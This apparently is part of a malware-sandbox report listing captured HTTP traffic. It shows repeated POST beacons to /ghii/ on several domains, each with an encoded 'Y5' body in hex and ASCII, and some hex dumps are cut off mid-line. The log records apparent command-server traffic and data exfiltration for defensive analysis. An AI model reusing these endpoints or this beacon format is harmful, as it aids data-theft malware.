4a 49 64 6b 5a 6a 58 49 76 42 62 42 6c 4c 73 49 4a 31 4d 67 6b 45 71 30 31 36 4b 68 52 71 68 63 35 4a 4b 77 56 33 6d 6d 37 30 48 72 6c 28 4f 68 6d 73 73 28 68 6e 71 44 62 61 5f 32 32 4d 46 69 77 77 4f 73 6f 64 48 31 6f 70 49 45 4a 28 4b 69 76 4d 65 38 4a 7e 6e 74 4a 28 66 71 6
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.7dkjhk.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.7dkjhk.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.7dkjhk.com/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 35 3d 54 6e 53 75 35 6e 66 70 62 65 37 50 64 34 41 33 55 70 4f 65 4c 78 30 79 4f 77 54 50 56 37 63 6d 6c 72 4e 47 7a 43 6e 71 63 58 42 63 31 37 71 44 4b 4a 42 42 42 6f 49 2d 49 31 70 35 31 67 6b 78 7a 65 31 39 5a 49 6f 34 6c 4d 6b 30 53 44 39 33 52 50 30 62 41 31 34 56 45 34 33 6b 7a 38 69 46 67 6d 6a 62 73 65 46 4d 43 74 4f 75 68 74 42 62 48 36 48 74 67 39 4c 58 76 46 45 48 53 6a 47 49 7e 34 76 4d 6f 6f 4b 4e 59 52 6a 73 5a 63 4d 43 37 59 4d 66 6a 32 58 54 35 71 75 5a 38 75 35 65 4c 7a 7a 67 30 35 50 75 6d 77 76 32 4a 6e 4d 43 75 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Y5=TnSu5nfpbe7Pd4A3UpOeLx0yOwTPV7cmlrNGzCnqcXBc17qDKJBBBoI-I1p51gkxze19ZIo4lMk0SD93RP0bA14VE43kz8iFgmjbseFMCtOuhtBbH6Htg9LXvFEHSjGI~4vMooKNYRjsZcMC7YMfj2XT5quZ8u5eLzzg05Pumwv2JnMCuQ).
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.7dkjhk.comConnection: closeContent-Length: 5332Cache-Control: no-cacheOrigin: http://www.7dkjhk.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.7dkjhk.com/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 35 3d 54 6e 53 75 35 6e 66 70 62 65 37 50 50 49 51 33 62 6f 4f 65 4b 52 30 78 42 51 54 50 62 72 63 69 6c 72 42 47 7a 41 4b 31 63 68 5a 63 31 73 6d 44 4b 73 74 42 4e 49 49 2d 4d 46 70 39 36 41 6c 30 7a 66 51 43 5a 49 34 6f 6c 4f 6f 30 53 52 46 33 57 76 30 59 49 31 34 51 58 49 33 6e 73 73 69 46 67 6d 6d 34 73 61 77 78 43 74 32 75 68 66 35 62 48 34 66 75 79 39 4c 61 6e 6c 45 48 53 6a 37 66 7e 34 76 36 6f 6f 43 64 59 52 44 73 59 4e 63 43 33 73 59 63 79 6d 57 36 6e 36 76 76 71 75 6b 61 4d 41 72 50 7e 72 48 30 70 57 57 62 45 48 52 54 73 46 44 4d 46 73 6f 34 48 6d 66 72 64 53 53 57 70 6a 67 43 41 62 48 55 51 4f 72 62 66 6c 59 79 51 56 51 37 4e 69 52 41 7e 43 4b 6d 67 43 70 31 54 5a 78 67 42 58 5a 72 37 6d 49 43 39 34 64 4b 51 6a 44 56 79 35 6c 45 6d 42 4d 57 63 71 55 31 4a 79 31 4b 4d 36 51 35 62 66 69 31 33 51 72 47 75 6e 7a 56 4c 66 5a 6e 33 47 6a 42 63 33 42 54 7e 56 74 6d 6e 66 71 5f 52 74 4f 47 70 4b 4b 33 68 48 42 53 46 71 76 6b 52 52 45 4e 56 55 67 74 39 59 45 35 55 70 39 4c 33 35 43 6f 68 6b 49 38 4f 69 33 39 4a 76 6b 74 35 79 48 44 68 30 37 66 4d 66 64 55 6c 5f 4e 77 73 39 78 33 31 4e 47 58 56 33 6a 4e 7a 67 42 70 79 66 65 6c 37 36 76 49 33 62 52 5f 28 75 44 39 42 51 39 46 6b 45 4d 33 4f 68 4a 73 73 66 4b 4c 69 70 37 30 50 54 65 66 66 36 41 4f 33 39 44 75 71 61 6a 62 36 6a 4b 78 63 59 65 48 58 7a 62 76 66 4c 4c 69 43 62 69 39 70 70 6e 63 72 6f 56 75 46 39 69 76 7e 4e 70 6b 37 76 74 6b 71 69 4f 4f 77 64 38 5a 39 76 50 38 4c 52 62 72 6b 79 59 51 4a 55 50 44 64 47 59 39 4d 54 48 69 38 64 4c 77 70 39 67 33 61 2d 28 35 4c 49 66 34 31 5f 57 41 6e 75 71 4e 55 2d 54 55 69 68 31 55 44 4b 51 58 4c 41 43 68 52 63 28 76 62 50 69 56 7a 47 38 68 4b 39 74 4e 77 62 49 4f 7a 47 62 42 54 37 33 59 47 6d 52 50 36 4f 6f 48 62 50 6a 33 38 51 30 57 72 51 30 77 62 37 59 69 41 75 75 72 7a 76 49 50 37 51 74 41 70 37 6d 67 30 4e 76 49 4f 6b 61 53 42 4f 69 66 51 6b 6e 34 43 5f 45 64 76 33 41 74 33 66 6a 70 77 6d 51 32 61 4b 46 6f 66 48 55 6c 58 63 61 6e 53 36 39 53 57 4a 49 4b 73 63 62 48 4f 73 52 59 69 37 76 31 36 48 30 71 4d 42 71 4f 38 44 31 4e 4e 41 7a 67 53 37 75 4a 65 55 59 33 73 72 6a 73 73 6c 49 45 61 52 50 44 30 35 4f 4a 49 6c 72 6c 74 79 71 43 37 75 34 76 6f 53 55 6d 48 41 63 4d 48 4a 53 33 69 7a 44 6b 4e 54 50 66 4c 64 4d 76 47 32 32 6e 57 70 38 5a 45 49 57 5a 71 35 57 6c 38 63 6d 38 67 33 78 4b 31 41 76 6b 36 73 6c 41 78 53 37 61 30 73 55 55 7e 6b 4a 46 41 53 65 6d 4d 38 59 6f 66 51 44 5a 4a 77 6c 48 46 48 46 59 4f 63 37 54 4d 4a 62 47 6a 44 39 52 44 45 30 4f 42 53 59 6e 6a 49 41 30 71 34 48 34 77 68 4e 4b 4a 45 7a 64 73 63 52 48 74 38 53 2d 4e 2d 54 61 44 47 70 6d 33 3
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.assilajamiart.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.assilajamiart.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.assilajamiart.com/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 35 3d 38 34 30 33 34 6b 4e 39 54 73 4c 50 66 52 6d 73 50 77 52 71 4b 79 65 4d 77 2d 30 59 64 5f 6f 71 78 5a 6e 38 62 43 42 70 5a 4b 28 59 6e 67 32 64 51 64 49 46 58 56 43 4e 49 78 6c 4d 73 51 63 56 44 68 64 37 64 34 6b 61 62 50 42 52 64 7a 33 70 35 33 45 78 30 6b 33 52 38 4a 61 51 64 33 28 76 46 2d 42 49 58 50 48 54 7e 30 6c 47 64 5f 70 49 68 77 48 53 49 61 55 64 75 69 44 68 47 6d 44 74 42 36 73 6b 72 66 47 57 48 72 44 39 57 51 77 41 63 64 42 6e 38 74 53 54 4c 76 34 54 42 74 28 53 72 35 4c 6f 4b 4d 72 44 43 74 7e 6d 46 4a 74 44 39 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Y5=84034kN9TsLPfRmsPwRqKyeMw-0Yd_oqxZn8bCBpZK(Yng2dQdIFXVCNIxlMsQcVDhd7d4kabPBRdz3p53Ex0k3R8JaQd3(vF-BIXPHT~0lGd_pIhwHSIaUduiDhGmDtB6skrfGWHrD9WQwAcdBn8tSTLv4TBt(Sr5LoKMrDCt~mFJtD9Q).
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.assilajamiart.comConnection: closeContent-Length: 5332Cache-Control: no-cacheOrigin: http://www.assilajamiart.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.assilajamiart.com/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 35 3d 38 34 30 33 34 6b 4e 39 54 73 4c 50 4f 42 32 73 41 7a 4a 71 4d 53 65 4e 31 2d 30 59 58 66 6f 75 78 5a 72 38 62 44 31 35 5a 38 48 59 6e 7a 4f 64 42 2d 67 46 51 6c 43 4e 4f 78 6c 49 7a 67 64 51 44 68 35 33 64 35 55 4b 62 4e 74 52 66 68 28 70 77 33 45 77 38 6b 33 51 39 4a 61 54 44 48 28 76 46 2d 63 6a 58 4f 47 73 7e 33 31 47 64 4e 68 49 68 32 54 52 4a 4b 55 65 67 79 44 68 47 6d 50 79 42 36 74 5a 72 66 66 52 48 74 7a 39 58 48 41 41 4d 63 42 67 31 64 53 55 44 50 34 4d 4a 5f 61 38 6d 72 43 65 4a 36 6e 4f 54 59 50 6d 4d 35 77 5f 6a 56 74 6a 4f 4e 66 79 76 4f 33 30 76 6d 6d 56 36 71 41 4d 47 69 37 64 66 71 47 49 4d 32 71 4f 6d 32 50 39 48 41 6e 70 4f 30 44 50 71 42 68 43 70 70 6f 45 4c 43 69 2d 6c 76 78 38 4c 76 72 72 6e 61 65 48 35 37 4e 43 42 68 76 39 73 55 4f 52 58 7a 56 67 55 67 76 75 54 58 6b 69 4a 78 37 68 79 72 44 74 76 54 6f 32 52 33 45 53 74 4d 6f 33 34 59 65 69 4e 59 7e 73 50 56 50 61 68 31 4a 68 5a 4d 70 55 64 69 41 39 71 44 6f 32 6d 32 48 6e 55 72 74 64 6b 52 47 65 62 44 6d 7a 45 44 6e 76 44 4b 57 58 5a 58 4b 45 52 4f 58 77 62 47 67 72 32 49 38 6f 79 31 63 4e 6c 6c 44 69 45 4d 58 55 6c 71 39 54 72 72 75 76 4a 68 38 56 51 74 75 32 47 2d 34 41 4a 49 37 48 39 44 33 42 28 48 67 61 48 42 79 4d 6f 32 6f 4c 31 67 41 34 4a 63 62 39 4b 36 5a 36 79 6f 43 54 74 52 68 46 59 6c 28 72 76 58 75 7a 59 51 72 67 70 44 65 6c 7a 4a 57 31 62 5a 37 44 4a 6a 59 56 38 6c 6e 4e 41 64 35 38 39 79 43 5a 58 31 28 69 79 50 51 41 49 47 65 4f 45 6b 66 4f 4c 41 55 2d 7e 6e 30 57 7a 6b 75 46 6c 31 56 50 4e 2d 63 72 76 6b 64 4a 42 73 4e 79 43 67 51 32 74 6d 74 50 59 67 53 37 41 63 35 32 79 46 68 79 79 6b 67 5f 65 6b 48 31 4d 5a 4a 31 54 35 50 53 33 37 69 53 37 73 7a 5f 31 69 7e 36 44 57 37 35 77 34 79 36 53 78 66 4e 75 4f 32 77 6a 69 77 65 74 6b 28 50 4b 46 30 66 48 51 37 71 49 77 73 42 41 67 58 69 41 62 52 51 72 35 4d 6b 57 30 58 47 6a 7a 4f 74 64 50 70 37 30 75 6b 76 4c 72 44 45 4e 4e 4d 36 6c 31 64 68 4e 37 74 77 73 2d 6f 7a 41 70 61 7a 58 70 76 4a 67 70 78 64 57 6e 4b 6d 6e 70 33 35 49 39 35 4a 52 67 6f 44 4e 48 49 70 4b 5a 35 7a 31 61 78 62 33 69 71 59 36 63 51 5f 65 78 62 74 70 65 5a 46 57 4b 61 51 43 41 38 34 59 4e 58 4a 31 69 58 45 75 64 4f 33 55 52 54 78 36 64 54 43 30 61 54 47 64 35 41 47 65 6d 6a 77 54 31 46 43 5a 72 4e 75 32 41 68 33 49 7a 4c 56 70 4b 75 51 39 42 57 70 38 65 67 4f 32 35 58 34 6a 78 48 57 59 66 51 62 56 35 61 52 5a 56 4e 66 44 47 42 64 72 6f 36 75 31 4e 77 49 66 2d 59 54 66 6d 72 78 47 6b 6c 66 57 68 48 76 63 4f 48 6e 47 4f 6f 38 4e 44 57 77 34 6f 41 6d 33 37 5a 56 49 37 49 62 53 65 46 6a 7a 48 51 52 37 59 66 6e 4c 6c 32 6e 39 69 7
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.sem-jobs.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.sem-jobs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sem-jobs.com/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 35 3d 68 35 43 34 30 42 6a 54 74 55 55 4d 66 37 75 6e 5a 4e 69 33 37 76 34 6d 73 6b 28 62 66 38 42 59 48 47 45 72 5a 6c 34 48 68 55 49 62 66 4c 79 35 49 4f 41 66 78 53 6c 46 36 4e 4e 42 31 67 32 47 43 42 6f 76 33 32 74 51 66 4d 6e 5f 28 42 46 6c 62 57 6e 6b 68 64 79 63 33 45 51 42 32 2d 6f 4b 36 30 74 6a 45 43 6b 46 48 31 49 37 78 61 77 34 59 66 4f 41 62 67 73 75 31 75 7e 73 43 44 61 47 69 38 68 38 71 61 36 32 4d 53 70 4a 34 58 59 67 28 35 54 52 38 38 44 53 4b 47 71 44 6f 52 6b 75 55 62 48 62 7a 7a 41 4e 43 66 68 33 34 51 7e 44 28 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Y5=h5C40BjTtUUMf7unZNi37v4msk(bf8BYHGErZl4HhUIbfLy5IOAfxSlF6NNB1g2GCBov32tQfMn_(BFlbWnkhdyc3EQB2-oK60tjECkFH1I7xaw4YfOAbgsu1u~sCDaGi8h8qa62MSpJ4XYg(5TR88DSKGqDoRkuUbHbzzANCfh34Q~D(g).
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.sem-jobs.comConnection: closeContent-Length: 5332Cache-Control: no-cacheOrigin: http://www.sem-jobs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sem-jobs.com/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 35 3d 68 35 43 34 30 42 6a 54 74 55 55 4d 65 62 79 6e 66 75 36 33 38 50 34 68 78 55 28 62 45 73 42 63 48 47 49 72 5a 67 59 58 6d 6d 6b 62 65 63 32 35 49 73 6f 66 7a 53 6c 46 38 4e 4e 46 37 41 33 66 43 41 4d 6a 33 30 31 41 66 4f 4c 5f 7e 58 42 6c 59 32 6e 6e 39 4e 79 64 30 45 51 43 72 75 6f 4b 36 30 68 4a 45 44 6c 34 48 78 4d 37 77 76 38 34 59 64 6d 44 61 77 73 76 34 4f 7e 73 43 44 57 5a 69 38 67 44 71 61 79 6d 4d 53 4a 4a 36 46 77 67 36 73 76 4f 31 4d 44 72 48 6d 72 30 6e 6c 39 6b 66 37 44 58 33 67 46 79 54 70 51 4c 36 55 36 4f 38 58 47 44 36 70 4e 56 74 70 61 4b 31 65 78 37 65 59 79 57 49 5a 77 6f 42 51 74 63 52 51 75 71 41 48 4e 79 73 79 4a 41 36 6e 4a 4b 31 72 69 42 46 44 6b 36 4e 34 32 74 6d 61 34 64 6e 53 59 74 38 68 67 43 36 4d 39 34 36 78 51 69 49 4c 4f 54 53 78 4b 71 66 38 76 4e 31 4e 65 32 65 49 35 32 66 70 4e 72 64 45 64 4c 58 36 52 31 76 51 32 52 7e 58 4c 4c 74 4b 28 47 4f 57 31 47 46 51 30 4d 68 71 51 5a 34 67 77 33 65 71 77 44 6a 55 7e 6b 69 76 38 33 62 53 75 58 59 4d 7e 59 50 55 58 66 6b 71 4b 78 64 33 36 64 65 46 7a 5a 4e 66 39 6f 65 6a 69 73 45 58 58 6e 6e 78 71 47 76 41 37 53 66 56 68 56 39 63 79 71 52 48 73 34 69 4a 74 32 56 6b 4e 73 56 76 39 66 77 6d 62 61 6c 67 4e 4d 59 73 53 61 31 57 59 46 36 6d 75 4c 7a 46 52 74 54 77 63 37 73 35 4f 4d 74 68 48 74 43 33 46 33 61 35 52 61 69 70 77 2d 67 34 41 6a 75 33 4b 71 74 76 4f 52 4b 56 39 44 35 6f 39 65 4f 62 57 43 63 72 68 75 33 6e 4c 2d 73 33 59 31 6d 67 6d 66 41 72 43 38 34 75 73 52 4e 74 45 7a 49 65 42 56 4c 54 68 62 67 38 69 41 6b 46 70 64 37 5a 4a 58 66 67 59 76 64 4b 79 63 4d 6f 32 70 28 44 37 32 62 79 65 66 50 64 69 37 48 46 62 57 31 71 43 55 59 6a 65 37 6b 64 6d 34 44 38 4c 57 6b 58 6b 33 50 61 53 56 55 37 35 75 59 39 6a 4d 4c 44 58 6f 4f 64 6e 30 43 44 34 4f 6d 6d 51 75 76 52 6d 52 6b 35 68 71 6f 61 75 32 44 70 4c 54 67 34 67 32 5a 69 69 78 78 49 61 41 4d 49 75 7a 73 53 4e 53 43 32 79 41 79 70 55 34 56 42 48 6b 70 76 73 74 34 47 75 4f 68 6b 76 30 6e 4a 67 66 71 66 69 55 30 37 79 6e 63 4a 5a 65 30 76 51 53 45 44 31 31 68 2d 6d 45 30 64 34 54 6f 54 4e 4f 52 51 36 47 49 72 4c 70 31 57 52 2d 63 39 6f 71 41 64 73 31 50 38 6a 51 33 51 6e 50 4e 72 6f 35 41 7a 61 75 79 4f 51 66 4b 4b 69 65 32 36 79 65 4c 65 45 6d 7a 30 35 56 76 69 66 6c 69 75 54 35 76 2d 71 41 39 56 43 4a 69 50 45 36 54 75 56 4b 4c 66 36 62 79 66 34 44 4a 70 6f 63 61 64 55 53 34 70 33 5f 66 6e 28 4f 72 72 5a 36 4f 4f 39 62 55 75 4b 71 50 66 69 76 50 6e 45 44 35 68 6b 68 6a 76 61 79 55 33 38 68 42 65 37 62 45 57 42 69 72 54 78 6c 63 2d 66 2d 4a 50 59 64 72 58 6b 78 36 44 51 5f 44 72 38 70 4a 5a 38 39 47 77 39 54 5a 51 50 4
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.yeah-go.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.yeah-go.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.yeah-go.com/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 35 3d 57 50 4e 76 45 53 39 59 61 73 45 4d 39 68 4a 59 64 39 77 41 68 48 28 69 45 54 68 47 54 36 77 59 76 6c 36 30 6f 47 32 35 66 48 64 56 30 4e 41 63 56 5a 4d 47 76 48 4d 53 69 6e 37 70 62 4f 6d 72 46 53 4b 74 51 69 34 49 56 61 74 6b 30 49 4c 58 73 7a 55 7a 67 52 59 76 53 58 4c 6e 77 69 74 4e 69 54 62 33 78 6c 58 72 79 43 4c 68 70 6a 4f 41 31 4c 69 6e 68 4a 6c 62 71 52 34 49 67 2d 72 31 75 4e 6a 63 54 61 65 54 6e 6d 7a 2d 66 73 7e 39 58 62 66 42 33 6f 69 52 52 32 4e 49 4d 76 51 55 4f 56 71 6a 65 49 62 4c 45 74 30 5f 73 61 45 59 28 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Y5=WPNvES9YasEM9hJYd9wAhH(iEThGT6wYvl60oG25fHdV0NAcVZMGvHMSin7pbOmrFSKtQi4IVatk0ILXszUzgRYvSXLnwitNiTb3xlXryCLhpjOA1LinhJlbqR4Ig-r1uNjcTaeTnmz-fs~9XbfB3oiRR2NIMvQUOVqjeIbLEt0_saEY(g).
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.yeah-go.comConnection: closeContent-Length: 5332Cache-Control: no-cacheOrigin: http://www.yeah-go.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.yeah-go.com/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 35 3d 57 50 4e 76 45 53 39 59 61 73 45 4d 38 42 35 59 66 61 4d 41 6b 6e 28 6c 49 7a 68 47 42 36 77 55 76 6c 47 30 6f 48 7a 6b 59 78 46 56 30 65 34 63 45 37 55 47 70 48 4d 53 6b 6e 37 58 55 75 6e 6f 46 54 75 4c 51 6a 4a 71 56 5a 42 6b 31 62 7a 58 38 6a 55 77 38 42 59 71 52 58 4c 6b 39 43 74 4e 69 54 6e 72 78 6e 28 37 79 47 50 68 70 57 61 41 31 4a 36 6b 7a 70 6c 65 69 78 34 49 67 2d 58 36 75 4e 69 70 54 61 58 49 6e 6e 50 2d 66 35 79 39 48 61 66 43 7a 34 69 57 62 57 4d 65 4d 5f 68 47 4c 47 36 73 59 4f 33 46 4c 4d 31 6e 6a 4a 41 57 71 53 28 30 77 6e 4f 5f 58 61 78 79 45 37 45 53 6c 6c 28 50 39 6f 6f 49 47 78 63 63 41 64 45 79 4c 48 62 43 6a 71 6c 49 32 77 31 56 36 68 6e 75 28 43 48 74 63 4c 79 73 51 4a 5a 6e 35 66 4f 69 55 55 53 6c 31 65 42 31 4d 78 65 2d 49 4a 4d 78 70 30 56 79 7a 33 67 51 30 64 65 76 6c 73 7e 4f 6f 54 6c 63 77 4a 57 7a 63 38 35 47 42 4b 78 4a 45 44 77 56 38 44 39 64 38 61 6e 48 68 45 64 6b 7a 5f 55 69 66 2d 4e 68 73 34 34 74 79 46 4d 64 36 61 66 72 73 36 4b 61 4b 50 69 55 4d 55 4d 51 46 41 48 69 71 44 56 5f 6d 6c 53 4e 6b 70 71 64 78 76 50 44 49 6b 4b 6a 6f 37 37 31 48 4f 63 4f 6a 77 76 5f 59 4a 75 38 4f 62 77 73 4a 48 54 4a 39 54 47 79 4c 73 56 6f 73 76 66 49 4a 4a 58 70 4c 44 47 79 45 7a 67 78 4d 6c 37 5a 55 67 55 7a 52 41 59 32 45 5a 4b 57 35 71 47 67 6e 5f 68 61 49 78 70 76 72 78 4c 77 74 45 57 36 6e 4e 6a 73 28 44 50 66 53 78 53 46 59 70 6b 32 35 6b 6b 6d 42 79 4e 49 4b 62 6d 66 28 5f 76 4c 50 39 6e 6e 5a 4c 6a 54 37 68 4b 7a 47 37 4a 49 42 62 41 76 68 67 32 6a 54 63 34 33 74 63 56 61 68 30 6b 64 7a 47 64 79 6b 50 55 6f 72 4c 4b 53 34 67 79 41 5a 4a 51 31 47 34 39 78 5a 59 53 64 48 48 68 33 4a 47 48 35 4b 77 68 63 6d 4c 44 71 49 43 76 6c 51 34 4d 45 79 51 67 39 47 48 6b 6e 6b 35 75 34 30 73 47 7a 41 75 34 35 39 72 43 76 46 44 63 42 69 35 34 49 43 6d 65 70 57 53 49 35 48 73 33 77 6b 59 46 53 28 76 50 6a 7a 34 4a 4a 30 42 78 53 45 39 51 2d 54 49 46 32 63 47 57 68 50 43 56 44 46 39 6b 34 67 35 79 42 57 75 41 36 4c 71 76 71 53 75 69 45 66 41 37 64 39 77 39 4f 4c 4e 36 6c 62 39 52 6d 77 36 6c 6f 42 51 57 53 61 49 57 48 56 4c 44 61 49 4e 70 47 38 66 42 59 77 79 39 70 64 70 54 4c 37 35 75 79 61 51 70 31 31 47 35 77 4c 39 78 6e 41 49 55 73 4b 41 5a 37 48 30 6d 6c 52 48 47 65 6e 72 58 59 6d 42 62 56 64 5f 46 64 78 31 31 75 71 32 48 31 72 6c 38 47 51 64 42 65 76 68 65 63 7e 69 7e 44 6f 4b 72 50 51 38 28 4f 57 4d 55 33 50 49 37 76 59 6a 36 75 78 45 58 78 54 6a 79 51 65 33 6d 39 6b 4c 56 6a 37 74 79 73 5a 5f 47 57 32 31 6a 54 58 5a 55 77 6e 33 79 6b 42 4f 66 4e 77 32 62 37 58 51 34 41 6f 77 58 42 78 49 45 46 71 72 69 74 6d 44 69 6a 4a 42 65 52 7
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.ixirwholesale.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ixirwholesale.xyz/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 35 3d 54 6c 42 56 7a 2d 46 77 41 74 61 53 75 66 44 57 63 57 69 32 47 4f 36 62 50 44 43 4e 57 59 49 35 44 52 53 51 66 6b 34 59 64 30 57 34 77 58 77 62 48 37 6f 30 52 75 67 70 34 6a 66 71 46 38 65 73 54 66 6b 31 66 68 33 34 6a 67 77 48 7e 58 4e 34 36 51 4a 5f 78 56 34 33 5a 36 72 49 71 4b 31 36 47 49 50 66 58 79 49 38 4f 64 53 75 57 4a 77 32 75 4c 72 67 73 46 70 4f 58 6b 69 57 30 74 61 58 48 74 74 4e 4d 52 72 51 34 34 4a 78 4c 52 55 4c 37 53 59 77 6d 70 71 66 36 2d 6e 6b 42 52 69 76 73 53 49 73 79 76 41 33 68 30 43 30 62 4e 71 75 56 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Y5=TlBVz-FwAtaSufDWcWi2GO6bPDCNWYI5DRSQfk4Yd0W4wXwbH7o0Rugp4jfqF8esTfk1fh34jgwH~XN46QJ_xV43Z6rIqK16GIPfXyI8OdSuWJw2uLrgsFpOXkiW0taXHttNMRrQ44JxLRUL7SYwmpqf6-nkBRivsSIsyvA3h0C0bNquVg).
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeContent-Length: 5332Cache-Control: no-cacheOrigin: http://www.ixirwholesale.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ixirwholesale.xyz/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 35 3d 54 6c 42 56 7a 2d 46 77 41 74 61 53 6f 2d 54 57 66 78 57 32 41 75 36 45 41 6a 43 4e 63 34 49 6c 44 52 65 51 66 6d 55 49 63 42 4f 34 31 56 49 62 48 64 45 30 43 2d 67 70 76 7a 66 75 49 63 65 2d 54 66 77 58 66 67 48 6f 6a 6b 55 48 28 42 42 34 74 41 4a 34 75 6c 35 51 63 36 72 4c 75 4b 31 36 47 49 44 35 58 32 55 47 4f 64 36 75 58 5f 45 32 75 4a 44 68 73 56 70 4e 59 45 69 57 30 74 57 49 48 74 74 37 4d 52 7a 35 34 37 78 78 5a 53 4d 4c 35 44 59 7a 68 35 71 45 6d 75 6d 72 46 42 44 32 35 54 41 53 37 4f 63 39 67 53 58 39 65 4a 28 36 43 6d 46 43 48 66 51 67 51 75 37 54 5a 43 57 44 6f 6c 61 4d 37 52 57 47 44 4b 4b 4f 59 4a 54 41 67 48 4d 35 74 53 79 6d 38 52 4b 46 73 72 41 4f 56 67 68 70 55 34 4e 4a 38 52 54 6a 69 75 55 4f 64 56 42 78 70 75 63 51 47 57 6f 6b 59 32 6e 45 64 73 37 37 65 66 6d 2d 77 57 4d 33 6e 2d 58 44 28 57 49 31 4a 36 7e 47 34 47 51 53 61 4b 35 74 4b 41 46 50 38 74 6b 65 45 42 32 70 45 48 59 51 52 66 66 6e 59 50 6b 70 72 59 71 46 71 4a 66 75 36 38 32 77 4c 4e 45 71 70 2d 36 77 62 6f 62 45 32 61 55 74 28 49 45 44 55 4e 49 37 6e 46 42 47 44 67 78 42 65 37 4a 50 57 33 48 78 68 72 39 4b 35 63 57 66 74 62 6b 57 39 46 33 6c 39 6d 63 46 36 32 67 61 61 51 36 7a 67 79 77 51 6d 47 76 63 4c 32 4d 47 6c 69 41 4d 63 42 4f 6e 72 6f 49 4a 52 51 32 49 64 52 74 59 7a 6e 55 6d 72 64 28 6b 34 57 6c 51 72 76 71 62 73 6f 43 50 72 49 4b 54 4b 6b 55 7a 4c 66 6a 72 73 48 34 4f 68 37 6c 30 52 6c 58 43 70 50 54 45 77 41 75 32 43 47 36 4a 41 4a 62 58 61 5f 53 62 51 55 70 52 6b 6e 30 55 75 44 64 57 28 47 52 4f 71 5f 42 56 31 41 72 54 63 5a 7e 55 50 39 4b 5f 4e 37 4d 36 55 6c 4d 4f 4f 71 43 4f 63 4f 6c 4e 6f 4b 57 63 43 55 30 41 53 66 4d 52 43 4a 43 62 46 5a 53 7a 51 58 56 6e 4a 65 58 42 75 49 55 52 44 59 44 36 71 5a 6f 48 5a 6a 53 6b 61 70 52 35 47 6b 6e 62 68 59 4c 47 38 74 35 44 38 55 6f 69 34 69 64 37 4e 34 43 41 53 59 61 65 4a 62 44 6c 35 77 76 34 64 5f 5a 4f 48 34 5a 68 35 66 57 53 4c 58 6a 58 4f 44 34 56 44 46 4e 78 79 31 44 47 54 43 72 6a 78 66 62 6b 79 70 6e 31 6e 64 6f 58 67 37 38 69 6f 35 5a 4e 7a 2d 53 51 6f 65 78 5f 77 77 74 7a 77 49 4e 59 34 6e 68 63 7a 53 66 59 34 4e 73 4f 6d 5f 7e 47 61 64 4e 47 4d 64 56 31 36 78 52 38 45 51 35 37 44 4e 53 46 57 56 57 54 52 33 62 6e 68 5a 48 77 79 2d 45 6e 59 71 72 5a 56 6e 51 51 34 55 34 39 67 6d 6f 53 44 34 45 57 6c 33 6c 36 42 72 4b 77 66 31 64 69 66 73 4d 